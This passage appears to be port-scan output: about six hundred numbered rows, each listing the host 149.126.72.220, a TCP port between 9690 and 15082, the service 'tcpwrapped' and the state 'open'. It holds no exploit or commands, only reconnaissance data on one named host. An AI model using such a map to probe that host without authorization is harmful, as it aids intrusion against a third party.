7428149.126.72.220 9690 tcp tcpwrapped open
7429149.126.72.220 9704 tcp tcpwrapped open
7430149.126.72.220 9710 tcp tcpwrapped open
7431149.126.72.220 9711 tcp tcpwrapped open
7432149.126.72.220 9765 tcp tcpwrapped open
7433149.126.72.220 9773 tcp tcpwrapped open
7434149.126.72.220 9779 tcp tcpwrapped open
7435149.126.72.220 9800 tcp tcpwrapped open
7436149.126.72.220 9803 tcp tcpwrapped open
7437149.126.72.220 9804 tcp tcpwrapped open
7438149.126.72.220 9950 tcp tcpwrapped open
7439149.126.72.220 9991 tcp tcpwrapped open
7440149.126.72.220 9992 tcp tcpwrapped open
7441149.126.72.220 9993 tcp tcpwrapped open
7442149.126.72.220 9994 tcp tcpwrapped open
7443149.126.72.220 9997 tcp tcpwrapped open
7444149.126.72.220 9998 tcp tcpwrapped open
7445149.126.72.220 9999 tcp tcpwrapped open
7446149.126.72.220 10000 tcp tcpwrapped open
7447149.126.72.220 10001 tcp tcpwrapped open
7448149.126.72.220 10002 tcp tcpwrapped open
7449149.126.72.220 10003 tcp tcpwrapped open
7450149.126.72.220 10004 tcp tcpwrapped open
7451149.126.72.220 10005 tcp tcpwrapped open
7452149.126.72.220 10006 tcp tcpwrapped open
7453149.126.72.220 10007 tcp tcpwrapped open
7454149.126.72.220 10008 tcp tcpwrapped open
7455149.126.72.220 10009 tcp tcpwrapped open
7456149.126.72.220 10010 tcp tcpwrapped open
7457149.126.72.220 10011 tcp tcpwrapped open
7458149.126.72.220 10012 tcp tcpwrapped open
7459149.126.72.220 10013 tcp tcpwrapped open
7460149.126.72.220 10014 tcp tcpwrapped open
7461149.126.72.220 10015 tcp tcpwrapped open
7462149.126.72.220 10016 tcp tcpwrapped open
7463149.126.72.220 10017 tcp tcpwrapped open
7464149.126.72.220 10018 tcp tcpwrapped open
7465149.126.72.220 10019 tcp tcpwrapped open
7466149.126.72.220 10020 tcp tcpwrapped open
7467149.126.72.220 10021 tcp tcpwrapped open
7468149.126.72.220 10022 tcp tcpwrapped open
7469149.126.72.220 10023 tcp tcpwrapped open
7470149.126.72.220 10024 tcp tcpwrapped open
7471149.126.72.220 10025 tcp tcpwrapped open
7472149.126.72.220 10026 tcp tcpwrapped open
7473149.126.72.220 10027 tcp tcpwrapped open
7474149.126.72.220 10028 tcp tcpwrapped open
7475149.126.72.220 10029 tcp tcpwrapped open
7476149.126.72.220 10030 tcp tcpwrapped open
7477149.126.72.220 10031 tcp tcpwrapped open
7478149.126.72.220 10032 tcp tcpwrapped open
7479149.126.72.220 10033 tcp tcpwrapped open
7480149.126.72.220 10034 tcp tcpwrapped open
7481149.126.72.220 10035 tcp tcpwrapped open
7482149.126.72.220 10036 tcp tcpwrapped open
7483149.126.72.220 10037 tcp tcpwrapped open
7484149.126.72.220 10038 tcp tcpwrapped open
7485149.126.72.220 10039 tcp tcpwrapped open
7486149.126.72.220 10040 tcp tcpwrapped open
7487149.126.72.220 10041 tcp tcpwrapped open
7488149.126.72.220 10042 tcp tcpwrapped open
7489149.126.72.220 10043 tcp tcpwrapped open
7490149.126.72.220 10044 tcp tcpwrapped open
7491149.126.72.220 10045 tcp tcpwrapped open
7492149.126.72.220 10046 tcp tcpwrapped open
7493149.126.72.220 10047 tcp tcpwrapped open
7494149.126.72.220 10048 tcp tcpwrapped open
7495149.126.72.220 10049 tcp tcpwrapped open
7496149.126.72.220 10065 tcp tcpwrapped open
7497149.126.72.220 10071 tcp tcpwrapped open
7498149.126.72.220 10075 tcp tcpwrapped open
7499149.126.72.220 10082 tcp tcpwrapped open
7500149.126.72.220 10084 tcp tcpwrapped open
7501149.126.72.220 10100 tcp tcpwrapped open
7502149.126.72.220 10123 tcp tcpwrapped open
7503149.126.72.220 10200 tcp tcpwrapped open
7504149.126.72.220 10443 tcp tcpwrapped open
7505149.126.72.220 10444 tcp tcpwrapped open
7506149.126.72.220 10892 tcp tcpwrapped open
7507149.126.72.220 10894 tcp tcpwrapped open
7508149.126.72.220 11001 tcp tcpwrapped open
7509149.126.72.220 11002 tcp tcpwrapped open
7510149.126.72.220 11007 tcp tcpwrapped open
7511149.126.72.220 11027 tcp tcpwrapped open
7512149.126.72.220 11065 tcp tcpwrapped open
7513149.126.72.220 11075 tcp tcpwrapped open
7514149.126.72.220 11082 tcp tcpwrapped open
7515149.126.72.220 11084 tcp tcpwrapped open
7516149.126.72.220 11110 tcp tcpwrapped open
7517149.126.72.220 11182 tcp tcpwrapped open
7518149.126.72.220 11184 tcp tcpwrapped open
7519149.126.72.220 11443 tcp tcpwrapped open
7520149.126.72.220 12016 tcp tcpwrapped open
7521149.126.72.220 12082 tcp tcpwrapped open
7522149.126.72.220 12084 tcp tcpwrapped open
7523149.126.72.220 12103 tcp tcpwrapped open
7524149.126.72.220 12104 tcp tcpwrapped open
7525149.126.72.220 12105 tcp tcpwrapped open
7526149.126.72.220 12106 tcp tcpwrapped open
7527149.126.72.220 12107 tcp tcpwrapped open
7528149.126.72.220 12108 tcp tcpwrapped open
7529149.126.72.220 12109 tcp tcpwrapped open
7530149.126.72.220 12110 tcp tcpwrapped open
7531149.126.72.220 12111 tcp tcpwrapped open
7532149.126.72.220 12112 tcp tcpwrapped open
7533149.126.72.220 12113 tcp tcpwrapped open
7534149.126.72.220 12114 tcp tcpwrapped open
7535149.126.72.220 12115 tcp tcpwrapped open
7536149.126.72.220 12116 tcp tcpwrapped open
7537149.126.72.220 12117 tcp tcpwrapped open
7538149.126.72.220 12118 tcp tcpwrapped open
7539149.126.72.220 12119 tcp tcpwrapped open
7540149.126.72.220 12120 tcp tcpwrapped open
7541149.126.72.220 12121 tcp tcpwrapped open
7542149.126.72.220 12122 tcp tcpwrapped open
7543149.126.72.220 12123 tcp tcpwrapped open
7544149.126.72.220 12124 tcp tcpwrapped open
7545149.126.72.220 12125 tcp tcpwrapped open
7546149.126.72.220 12126 tcp tcpwrapped open
7547149.126.72.220 12127 tcp tcpwrapped open
7548149.126.72.220 12128 tcp tcpwrapped open
7549149.126.72.220 12129 tcp tcpwrapped open
7550149.126.72.220 12130 tcp tcpwrapped open
7551149.126.72.220 12131 tcp tcpwrapped open
7552149.126.72.220 12132 tcp tcpwrapped open
7553149.126.72.220 12133 tcp tcpwrapped open
7554149.126.72.220 12134 tcp tcpwrapped open
7555149.126.72.220 12135 tcp tcpwrapped open
7556149.126.72.220 12136 tcp tcpwrapped open
7557149.126.72.220 12137 tcp tcpwrapped open
7558149.126.72.220 12138 tcp tcpwrapped open
7559149.126.72.220 12139 tcp tcpwrapped open
7560149.126.72.220 12140 tcp tcpwrapped open
7561149.126.72.220 12141 tcp tcpwrapped open
7562149.126.72.220 12142 tcp tcpwrapped open
7563149.126.72.220 12143 tcp tcpwrapped open
7564149.126.72.220 12144 tcp tcpwrapped open
7565149.126.72.220 12145 tcp tcpwrapped open
7566149.126.72.220 12146 tcp tcpwrapped open
7567149.126.72.220 12147 tcp tcpwrapped open
7568149.126.72.220 12148 tcp tcpwrapped open
7569149.126.72.220 12149 tcp tcpwrapped open
7570149.126.72.220 12150 tcp tcpwrapped open
7571149.126.72.220 12151 tcp tcpwrapped open
7572149.126.72.220 12152 tcp tcpwrapped open
7573149.126.72.220 12153 tcp tcpwrapped open
7574149.126.72.220 12154 tcp tcpwrapped open
7575149.126.72.220 12155 tcp tcpwrapped open
7576149.126.72.220 12156 tcp tcpwrapped open
7577149.126.72.220 12157 tcp tcpwrapped open
7578149.126.72.220 12158 tcp tcpwrapped open
7579149.126.72.220 12159 tcp tcpwrapped open
7580149.126.72.220 12160 tcp tcpwrapped open
7581149.126.72.220 12161 tcp tcpwrapped open
7582149.126.72.220 12162 tcp tcpwrapped open
7583149.126.72.220 12163 tcp tcpwrapped open
7584149.126.72.220 12164 tcp tcpwrapped open
7585149.126.72.220 12165 tcp tcpwrapped open
7586149.126.72.220 12166 tcp tcpwrapped open
7587149.126.72.220 12167 tcp tcpwrapped open
7588149.126.72.220 12168 tcp tcpwrapped open
7589149.126.72.220 12169 tcp tcpwrapped open
7590149.126.72.220 12170 tcp tcpwrapped open
7591149.126.72.220 12171 tcp tcpwrapped open
7592149.126.72.220 12172 tcp tcpwrapped open
7593149.126.72.220 12173 tcp tcpwrapped open
7594149.126.72.220 12174 tcp tcpwrapped open
7595149.126.72.220 12175 tcp tcpwrapped open
7596149.126.72.220 12176 tcp tcpwrapped open
7597149.126.72.220 12177 tcp tcpwrapped open
7598149.126.72.220 12178 tcp tcpwrapped open
7599149.126.72.220 12179 tcp tcpwrapped open
7600149.126.72.220 12180 tcp tcpwrapped open
7601149.126.72.220 12181 tcp tcpwrapped open
7602149.126.72.220 12182 tcp tcpwrapped open
7603149.126.72.220 12183 tcp tcpwrapped open
7604149.126.72.220 12184 tcp tcpwrapped open
7605149.126.72.220 12185 tcp tcpwrapped open
7606149.126.72.220 12186 tcp tcpwrapped open
7607149.126.72.220 12187 tcp tcpwrapped open
7608149.126.72.220 12188 tcp tcpwrapped open
7609149.126.72.220 12189 tcp tcpwrapped open
7610149.126.72.220 12190 tcp tcpwrapped open
7611149.126.72.220 12191 tcp tcpwrapped open
7612149.126.72.220 12192 tcp tcpwrapped open
7613149.126.72.220 12193 tcp tcpwrapped open
7614149.126.72.220 12194 tcp tcpwrapped open
7615149.126.72.220 12195 tcp tcpwrapped open
7616149.126.72.220 12196 tcp tcpwrapped open
7617149.126.72.220 12197 tcp tcpwrapped open
7618149.126.72.220 12198 tcp tcpwrapped open
7619149.126.72.220 12199 tcp tcpwrapped open
7620149.126.72.220 12200 tcp tcpwrapped open
7621149.126.72.220 12201 tcp tcpwrapped open
7622149.126.72.220 12202 tcp tcpwrapped open
7623149.126.72.220 12203 tcp tcpwrapped open
7624149.126.72.220 12204 tcp tcpwrapped open
7625149.126.72.220 12205 tcp tcpwrapped open
7626149.126.72.220 12206 tcp tcpwrapped open
7627149.126.72.220 12207 tcp tcpwrapped open
7628149.126.72.220 12208 tcp tcpwrapped open
7629149.126.72.220 12209 tcp tcpwrapped open
7630149.126.72.220 12210 tcp tcpwrapped open
7631149.126.72.220 12211 tcp tcpwrapped open
7632149.126.72.220 12212 tcp tcpwrapped open
7633149.126.72.220 12213 tcp tcpwrapped open
7634149.126.72.220 12214 tcp tcpwrapped open
7635149.126.72.220 12215 tcp tcpwrapped open
7636149.126.72.220 12216 tcp tcpwrapped open
7637149.126.72.220 12217 tcp tcpwrapped open
7638149.126.72.220 12218 tcp tcpwrapped open
7639149.126.72.220 12219 tcp tcpwrapped open
7640149.126.72.220 12220 tcp tcpwrapped open
7641149.126.72.220 12221 tcp tcpwrapped open
7642149.126.72.220 12222 tcp tcpwrapped open
7643149.126.72.220 12223 tcp tcpwrapped open
7644149.126.72.220 12224 tcp tcpwrapped open
7645149.126.72.220 12225 tcp tcpwrapped open
7646149.126.72.220 12226 tcp tcpwrapped open
7647149.126.72.220 12227 tcp tcpwrapped open
7648149.126.72.220 12228 tcp tcpwrapped open
7649149.126.72.220 12229 tcp tcpwrapped open
7650149.126.72.220 12230 tcp tcpwrapped open
7651149.126.72.220 12231 tcp tcpwrapped open
7652149.126.72.220 12232 tcp tcpwrapped open
7653149.126.72.220 12233 tcp tcpwrapped open
7654149.126.72.220 12234 tcp tcpwrapped open
7655149.126.72.220 12235 tcp tcpwrapped open
7656149.126.72.220 12236 tcp tcpwrapped open
7657149.126.72.220 12237 tcp tcpwrapped open
7658149.126.72.220 12238 tcp tcpwrapped open
7659149.126.72.220 12239 tcp tcpwrapped open
7660149.126.72.220 12240 tcp tcpwrapped open
7661149.126.72.220 12241 tcp tcpwrapped open
7662149.126.72.220 12242 tcp tcpwrapped open
7663149.126.72.220 12243 tcp tcpwrapped open
7664149.126.72.220 12244 tcp tcpwrapped open
7665149.126.72.220 12245 tcp tcpwrapped open
7666149.126.72.220 12246 tcp tcpwrapped open
7667149.126.72.220 12247 tcp tcpwrapped open
7668149.126.72.220 12248 tcp tcpwrapped open
7669149.126.72.220 12249 tcp tcpwrapped open
7670149.126.72.220 12250 tcp tcpwrapped open
7671149.126.72.220 12251 tcp tcpwrapped open
7672149.126.72.220 12252 tcp tcpwrapped open
7673149.126.72.220 12253 tcp tcpwrapped open
7674149.126.72.220 12254 tcp tcpwrapped open
7675149.126.72.220 12255 tcp tcpwrapped open
7676149.126.72.220 12256 tcp tcpwrapped open
7677149.126.72.220 12257 tcp tcpwrapped open
7678149.126.72.220 12258 tcp tcpwrapped open
7679149.126.72.220 12259 tcp tcpwrapped open
7680149.126.72.220 12260 tcp tcpwrapped open
7681149.126.72.220 12261 tcp tcpwrapped open
7682149.126.72.220 12262 tcp tcpwrapped open
7683149.126.72.220 12263 tcp tcpwrapped open
7684149.126.72.220 12264 tcp tcpwrapped open
7685149.126.72.220 12265 tcp tcpwrapped open
7686149.126.72.220 12266 tcp tcpwrapped open
7687149.126.72.220 12267 tcp tcpwrapped open
7688149.126.72.220 12268 tcp tcpwrapped open
7689149.126.72.220 12269 tcp tcpwrapped open
7690149.126.72.220 12270 tcp tcpwrapped open
7691149.126.72.220 12271 tcp tcpwrapped open
7692149.126.72.220 12272 tcp tcpwrapped open
7693149.126.72.220 12273 tcp tcpwrapped open
7694149.126.72.220 12274 tcp tcpwrapped open
7695149.126.72.220 12275 tcp tcpwrapped open
7696149.126.72.220 12276 tcp tcpwrapped open
7697149.126.72.220 12277 tcp tcpwrapped open
7698149.126.72.220 12278 tcp tcpwrapped open
7699149.126.72.220 12279 tcp tcpwrapped open
7700149.126.72.220 12280 tcp tcpwrapped open
7701149.126.72.220 12281 tcp tcpwrapped open
7702149.126.72.220 12282 tcp tcpwrapped open
7703149.126.72.220 12283 tcp tcpwrapped open
7704149.126.72.220 12284 tcp tcpwrapped open
7705149.126.72.220 12285 tcp tcpwrapped open
7706149.126.72.220 12286 tcp tcpwrapped open
7707149.126.72.220 12287 tcp tcpwrapped open
7708149.126.72.220 12288 tcp tcpwrapped open
7709149.126.72.220 12289 tcp tcpwrapped open
7710149.126.72.220 12290 tcp tcpwrapped open
7711149.126.72.220 12291 tcp tcpwrapped open
7712149.126.72.220 12292 tcp tcpwrapped open
7713149.126.72.220 12293 tcp tcpwrapped open
7714149.126.72.220 12294 tcp tcpwrapped open
7715149.126.72.220 12295 tcp tcpwrapped open
7716149.126.72.220 12296 tcp tcpwrapped open
7717149.126.72.220 12297 tcp tcpwrapped open
7718149.126.72.220 12298 tcp tcpwrapped open
7719149.126.72.220 12299 tcp tcpwrapped open
7720149.126.72.220 12300 tcp tcpwrapped open
7721149.126.72.220 12301 tcp tcpwrapped open
7722149.126.72.220 12302 tcp tcpwrapped open
7723149.126.72.220 12303 tcp tcpwrapped open
7724149.126.72.220 12304 tcp tcpwrapped open
7725149.126.72.220 12305 tcp tcpwrapped open
7726149.126.72.220 12306 tcp tcpwrapped open
7727149.126.72.220 12307 tcp tcpwrapped open
7728149.126.72.220 12308 tcp tcpwrapped open
7729149.126.72.220 12309 tcp tcpwrapped open
7730149.126.72.220 12310 tcp tcpwrapped open
7731149.126.72.220 12311 tcp tcpwrapped open
7732149.126.72.220 12312 tcp tcpwrapped open
7733149.126.72.220 12313 tcp tcpwrapped open
7734149.126.72.220 12314 tcp tcpwrapped open
7735149.126.72.220 12315 tcp tcpwrapped open
7736149.126.72.220 12316 tcp tcpwrapped open
7737149.126.72.220 12317 tcp tcpwrapped open
7738149.126.72.220 12318 tcp tcpwrapped open
7739149.126.72.220 12319 tcp tcpwrapped open
7740149.126.72.220 12320 tcp tcpwrapped open
7741149.126.72.220 12321 tcp tcpwrapped open
7742149.126.72.220 12322 tcp tcpwrapped open
7743149.126.72.220 12323 tcp tcpwrapped open
7744149.126.72.220 12324 tcp tcpwrapped open
7745149.126.72.220 12325 tcp tcpwrapped open
7746149.126.72.220 12326 tcp tcpwrapped open
7747149.126.72.220 12327 tcp tcpwrapped open
7748149.126.72.220 12328 tcp tcpwrapped open
7749149.126.72.220 12329 tcp tcpwrapped open
7750149.126.72.220 12330 tcp tcpwrapped open
7751149.126.72.220 12331 tcp tcpwrapped open
7752149.126.72.220 12332 tcp tcpwrapped open
7753149.126.72.220 12333 tcp tcpwrapped open
7754149.126.72.220 12334 tcp tcpwrapped open
7755149.126.72.220 12335 tcp tcpwrapped open
7756149.126.72.220 12336 tcp tcpwrapped open
7757149.126.72.220 12337 tcp tcpwrapped open
7758149.126.72.220 12338 tcp tcpwrapped open
7759149.126.72.220 12339 tcp tcpwrapped open
7760149.126.72.220 12340 tcp tcpwrapped open
7761149.126.72.220 12341 tcp tcpwrapped open
7762149.126.72.220 12342 tcp tcpwrapped open
7763149.126.72.220 12343 tcp tcpwrapped open
7764149.126.72.220 12344 tcp tcpwrapped open
7765149.126.72.220 12345 tcp tcpwrapped open
7766149.126.72.220 12346 tcp tcpwrapped open
7767149.126.72.220 12347 tcp tcpwrapped open
7768149.126.72.220 12348 tcp tcpwrapped open
7769149.126.72.220 12349 tcp tcpwrapped open
7770149.126.72.220 12350 tcp tcpwrapped open
7771149.126.72.220 12351 tcp tcpwrapped open
7772149.126.72.220 12352 tcp tcpwrapped open
7773149.126.72.220 12353 tcp tcpwrapped open
7774149.126.72.220 12354 tcp tcpwrapped open
7775149.126.72.220 12355 tcp tcpwrapped open
7776149.126.72.220 12356 tcp tcpwrapped open
7777149.126.72.220 12357 tcp tcpwrapped open
7778149.126.72.220 12358 tcp tcpwrapped open
7779149.126.72.220 12359 tcp tcpwrapped open
7780149.126.72.220 12360 tcp tcpwrapped open
7781149.126.72.220 12361 tcp tcpwrapped open
7782149.126.72.220 12362 tcp tcpwrapped open
7783149.126.72.220 12363 tcp tcpwrapped open
7784149.126.72.220 12364 tcp tcpwrapped open
7785149.126.72.220 12365 tcp tcpwrapped open
7786149.126.72.220 12366 tcp tcpwrapped open
7787149.126.72.220 12367 tcp tcpwrapped open
7788149.126.72.220 12368 tcp tcpwrapped open
7789149.126.72.220 12369 tcp tcpwrapped open
7790149.126.72.220 12370 tcp tcpwrapped open
7791149.126.72.220 12371 tcp tcpwrapped open
7792149.126.72.220 12372 tcp tcpwrapped open
7793149.126.72.220 12373 tcp tcpwrapped open
7794149.126.72.220 12374 tcp tcpwrapped open
7795149.126.72.220 12375 tcp tcpwrapped open
7796149.126.72.220 12376 tcp tcpwrapped open
7797149.126.72.220 12377 tcp tcpwrapped open
7798149.126.72.220 12378 tcp tcpwrapped open
7799149.126.72.220 12379 tcp tcpwrapped open
7800149.126.72.220 12380 tcp tcpwrapped open
7801149.126.72.220 12381 tcp tcpwrapped open
7802149.126.72.220 12382 tcp tcpwrapped open
7803149.126.72.220 12383 tcp tcpwrapped open
7804149.126.72.220 12384 tcp tcpwrapped open
7805149.126.72.220 12385 tcp tcpwrapped open
7806149.126.72.220 12386 tcp tcpwrapped open
7807149.126.72.220 12387 tcp tcpwrapped open
7808149.126.72.220 12388 tcp tcpwrapped open
7809149.126.72.220 12389 tcp tcpwrapped open
7810149.126.72.220 12390 tcp tcpwrapped open
7811149.126.72.220 12391 tcp tcpwrapped open
7812149.126.72.220 12392 tcp tcpwrapped open
7813149.126.72.220 12393 tcp tcpwrapped open
7814149.126.72.220 12394 tcp tcpwrapped open
7815149.126.72.220 12395 tcp tcpwrapped open
7816149.126.72.220 12396 tcp tcpwrapped open
7817149.126.72.220 12397 tcp tcpwrapped open
7818149.126.72.220 12398 tcp tcpwrapped open
7819149.126.72.220 12399 tcp tcpwrapped open
7820149.126.72.220 12400 tcp tcpwrapped open
7821149.126.72.220 12401 tcp tcpwrapped open
7822149.126.72.220 12402 tcp tcpwrapped open
7823149.126.72.220 12403 tcp tcpwrapped open
7824149.126.72.220 12404 tcp tcpwrapped open
7825149.126.72.220 12405 tcp tcpwrapped open
7826149.126.72.220 12406 tcp tcpwrapped open
7827149.126.72.220 12407 tcp tcpwrapped open
7828149.126.72.220 12408 tcp tcpwrapped open
7829149.126.72.220 12409 tcp tcpwrapped open
7830149.126.72.220 12410 tcp tcpwrapped open
7831149.126.72.220 12411 tcp tcpwrapped open
7832149.126.72.220 12412 tcp tcpwrapped open
7833149.126.72.220 12413 tcp tcpwrapped open
7834149.126.72.220 12414 tcp tcpwrapped open
7835149.126.72.220 12415 tcp tcpwrapped open
7836149.126.72.220 12416 tcp tcpwrapped open
7837149.126.72.220 12417 tcp tcpwrapped open
7838149.126.72.220 12418 tcp tcpwrapped open
7839149.126.72.220 12419 tcp tcpwrapped open
7840149.126.72.220 12420 tcp tcpwrapped open
7841149.126.72.220 12421 tcp tcpwrapped open
7842149.126.72.220 12422 tcp tcpwrapped open
7843149.126.72.220 12423 tcp tcpwrapped open
7844149.126.72.220 12424 tcp tcpwrapped open
7845149.126.72.220 12425 tcp tcpwrapped open
7846149.126.72.220 12426 tcp tcpwrapped open
7847149.126.72.220 12427 tcp tcpwrapped open
7848149.126.72.220 12428 tcp tcpwrapped open
7849149.126.72.220 12429 tcp tcpwrapped open
7850149.126.72.220 12430 tcp tcpwrapped open
7851149.126.72.220 12431 tcp tcpwrapped open
7852149.126.72.220 12432 tcp tcpwrapped open
7853149.126.72.220 12433 tcp tcpwrapped open
7854149.126.72.220 12434 tcp tcpwrapped open
7855149.126.72.220 12435 tcp tcpwrapped open
7856149.126.72.220 12436 tcp tcpwrapped open
7857149.126.72.220 12437 tcp tcpwrapped open
7858149.126.72.220 12438 tcp tcpwrapped open
7859149.126.72.220 12439 tcp tcpwrapped open
7860149.126.72.220 12440 tcp tcpwrapped open
7861149.126.72.220 12441 tcp tcpwrapped open
7862149.126.72.220 12442 tcp tcpwrapped open
7863149.126.72.220 12443 tcp tcpwrapped open
7864149.126.72.220 12444 tcp tcpwrapped open
7865149.126.72.220 12445 tcp tcpwrapped open
7866149.126.72.220 12446 tcp tcpwrapped open
7867149.126.72.220 12447 tcp tcpwrapped open
7868149.126.72.220 12448 tcp tcpwrapped open
7869149.126.72.220 12449 tcp tcpwrapped open
7870149.126.72.220 12450 tcp tcpwrapped open
7871149.126.72.220 12451 tcp tcpwrapped open
7872149.126.72.220 12452 tcp tcpwrapped open
7873149.126.72.220 12453 tcp tcpwrapped open
7874149.126.72.220 12454 tcp tcpwrapped open
7875149.126.72.220 12455 tcp tcpwrapped open
7876149.126.72.220 12456 tcp tcpwrapped open
7877149.126.72.220 12457 tcp tcpwrapped open
7878149.126.72.220 12458 tcp tcpwrapped open
7879149.126.72.220 12459 tcp tcpwrapped open
7880149.126.72.220 12460 tcp tcpwrapped open
7881149.126.72.220 12461 tcp tcpwrapped open
7882149.126.72.220 12462 tcp tcpwrapped open
7883149.126.72.220 12463 tcp tcpwrapped open
7884149.126.72.220 12464 tcp tcpwrapped open
7885149.126.72.220 12465 tcp tcpwrapped open
7886149.126.72.220 12466 tcp tcpwrapped open
7887149.126.72.220 12467 tcp tcpwrapped open
7888149.126.72.220 12468 tcp tcpwrapped open
7889149.126.72.220 12469 tcp tcpwrapped open
7890149.126.72.220 12470 tcp tcpwrapped open
7891149.126.72.220 12471 tcp tcpwrapped open
7892149.126.72.220 12472 tcp tcpwrapped open
7893149.126.72.220 12473 tcp tcpwrapped open
7894149.126.72.220 12474 tcp tcpwrapped open
7895149.126.72.220 12475 tcp tcpwrapped open
7896149.126.72.220 12476 tcp tcpwrapped open
7897149.126.72.220 12477 tcp tcpwrapped open
7898149.126.72.220 12478 tcp tcpwrapped open
7899149.126.72.220 12479 tcp tcpwrapped open
7900149.126.72.220 12480 tcp tcpwrapped open
7901149.126.72.220 12481 tcp tcpwrapped open
7902149.126.72.220 12482 tcp tcpwrapped open
7903149.126.72.220 12483 tcp tcpwrapped open
7904149.126.72.220 12484 tcp tcpwrapped open
7905149.126.72.220 12485 tcp tcpwrapped open
7906149.126.72.220 12486 tcp tcpwrapped open
7907149.126.72.220 12487 tcp tcpwrapped open
7908149.126.72.220 12488 tcp tcpwrapped open
7909149.126.72.220 12489 tcp tcpwrapped open
7910149.126.72.220 12490 tcp tcpwrapped open
7911149.126.72.220 12491 tcp tcpwrapped open
7912149.126.72.220 12492 tcp tcpwrapped open
7913149.126.72.220 12493 tcp tcpwrapped open
7914149.126.72.220 12494 tcp tcpwrapped open
7915149.126.72.220 12495 tcp tcpwrapped open
7916149.126.72.220 12496 tcp tcpwrapped open
7917149.126.72.220 12497 tcp tcpwrapped open
7918149.126.72.220 12498 tcp tcpwrapped open
7919149.126.72.220 12499 tcp tcpwrapped open
7920149.126.72.220 12500 tcp tcpwrapped open
7921149.126.72.220 12501 tcp tcpwrapped open
7922149.126.72.220 12502 tcp tcpwrapped open
7923149.126.72.220 12503 tcp tcpwrapped open
7924149.126.72.220 12504 tcp tcpwrapped open
7925149.126.72.220 12505 tcp tcpwrapped open
7926149.126.72.220 12506 tcp tcpwrapped open
7927149.126.72.220 12507 tcp tcpwrapped open
7928149.126.72.220 12508 tcp tcpwrapped open
7929149.126.72.220 12509 tcp tcpwrapped open
7930149.126.72.220 12510 tcp tcpwrapped open
7931149.126.72.220 12511 tcp tcpwrapped open
7932149.126.72.220 12512 tcp tcpwrapped open
7933149.126.72.220 12513 tcp tcpwrapped open
7934149.126.72.220 12514 tcp tcpwrapped open
7935149.126.72.220 12515 tcp tcpwrapped open
7936149.126.72.220 12516 tcp tcpwrapped open
7937149.126.72.220 12517 tcp tcpwrapped open
7938149.126.72.220 12518 tcp tcpwrapped open
7939149.126.72.220 12519 tcp tcpwrapped open
7940149.126.72.220 12520 tcp tcpwrapped open
7941149.126.72.220 12521 tcp tcpwrapped open
7942149.126.72.220 12522 tcp tcpwrapped open
7943149.126.72.220 12523 tcp tcpwrapped open
7944149.126.72.220 12524 tcp tcpwrapped open
7945149.126.72.220 12525 tcp tcpwrapped open
7946149.126.72.220 12526 tcp tcpwrapped open
7947149.126.72.220 12527 tcp tcpwrapped open
7948149.126.72.220 12528 tcp tcpwrapped open
7949149.126.72.220 12529 tcp tcpwrapped open
7950149.126.72.220 12530 tcp tcpwrapped open
7951149.126.72.220 12531 tcp tcpwrapped open
7952149.126.72.220 12532 tcp tcpwrapped open
7953149.126.72.220 12533 tcp tcpwrapped open
7954149.126.72.220 12534 tcp tcpwrapped open
7955149.126.72.220 12535 tcp tcpwrapped open
7956149.126.72.220 12536 tcp tcpwrapped open
7957149.126.72.220 12537 tcp tcpwrapped open
7958149.126.72.220 12538 tcp tcpwrapped open
7959149.126.72.220 12539 tcp tcpwrapped open
7960149.126.72.220 12540 tcp tcpwrapped open
7961149.126.72.220 12541 tcp tcpwrapped open
7962149.126.72.220 12542 tcp tcpwrapped open
7963149.126.72.220 12543 tcp tcpwrapped open
7964149.126.72.220 12544 tcp tcpwrapped open
7965149.126.72.220 12545 tcp tcpwrapped open
7966149.126.72.220 12546 tcp tcpwrapped open
7967149.126.72.220 12547 tcp tcpwrapped open
7968149.126.72.220 12548 tcp tcpwrapped open
7969149.126.72.220 12549 tcp tcpwrapped open
7970149.126.72.220 12550 tcp tcpwrapped open
7971149.126.72.220 12551 tcp tcpwrapped open
7972149.126.72.220 12552 tcp tcpwrapped open
7973149.126.72.220 12553 tcp tcpwrapped open
7974149.126.72.220 12554 tcp tcpwrapped open
7975149.126.72.220 12555 tcp tcpwrapped open
7976149.126.72.220 12556 tcp tcpwrapped open
7977149.126.72.220 12557 tcp tcpwrapped open
7978149.126.72.220 12558 tcp tcpwrapped open
7979149.126.72.220 12559 tcp tcpwrapped open
7980149.126.72.220 12560 tcp tcpwrapped open
7981149.126.72.220 12561 tcp tcpwrapped open
7982149.126.72.220 12562 tcp tcpwrapped open
7983149.126.72.220 12563 tcp tcpwrapped open
7984149.126.72.220 12564 tcp tcpwrapped open
7985149.126.72.220 12565 tcp tcpwrapped open
7986149.126.72.220 12566 tcp tcpwrapped open
7987149.126.72.220 12567 tcp tcpwrapped open
7988149.126.72.220 12568 tcp tcpwrapped open
7989149.126.72.220 12569 tcp tcpwrapped open
7990149.126.72.220 12570 tcp tcpwrapped open
7991149.126.72.220 12571 tcp tcpwrapped open
7992149.126.72.220 12572 tcp tcpwrapped open
7993149.126.72.220 12573 tcp tcpwrapped open
7994149.126.72.220 12574 tcp tcpwrapped open
7995149.126.72.220 12575 tcp tcpwrapped open
7996149.126.72.220 12576 tcp tcpwrapped open
7997149.126.72.220 12577 tcp tcpwrapped open
7998149.126.72.220 12578 tcp tcpwrapped open
7999149.126.72.220 12579 tcp tcpwrapped open
8000149.126.72.220 12580 tcp tcpwrapped open
8001149.126.72.220 12581 tcp tcpwrapped open
8002149.126.72.220 12582 tcp tcpwrapped open
8003149.126.72.220 12583 tcp tcpwrapped open
8004149.126.72.220 12584 tcp tcpwrapped open
8005149.126.72.220 12585 tcp tcpwrapped open
8006149.126.72.220 12586 tcp tcpwrapped open
8007149.126.72.220 12587 tcp tcpwrapped open
8008149.126.72.220 12588 tcp tcpwrapped open
8009149.126.72.220 12589 tcp tcpwrapped open
8010149.126.72.220 12590 tcp tcpwrapped open
8011149.126.72.220 13082 tcp tcpwrapped open
8012149.126.72.220 13084 tcp tcpwrapped open
8013149.126.72.220 13333 tcp tcpwrapped open
8014149.126.72.220 13443 tcp tcpwrapped open
8015149.126.72.220 14006 tcp tcpwrapped open
8016149.126.72.220 14082 tcp tcpwrapped open
8017149.126.72.220 14084 tcp tcpwrapped open
8018149.126.72.220 14104 tcp tcpwrapped open
8019149.126.72.220 14130 tcp tcpwrapped open
8020149.126.72.220 14182 tcp tcpwrapped open
8021149.126.72.220 14184 tcp tcpwrapped open
8022149.126.72.220 14330 tcp tcpwrapped open
8023149.126.72.220 14443 tcp tcpwrapped open
8024149.126.72.220 14825 tcp tcpwrapped open
8025149.126.72.220 15002 tcp tcpwrapped open
8026149.126.72.220 15006 tcp tcpwrapped open
8027149.126.72.220 15082 tcp tcpwrapped open
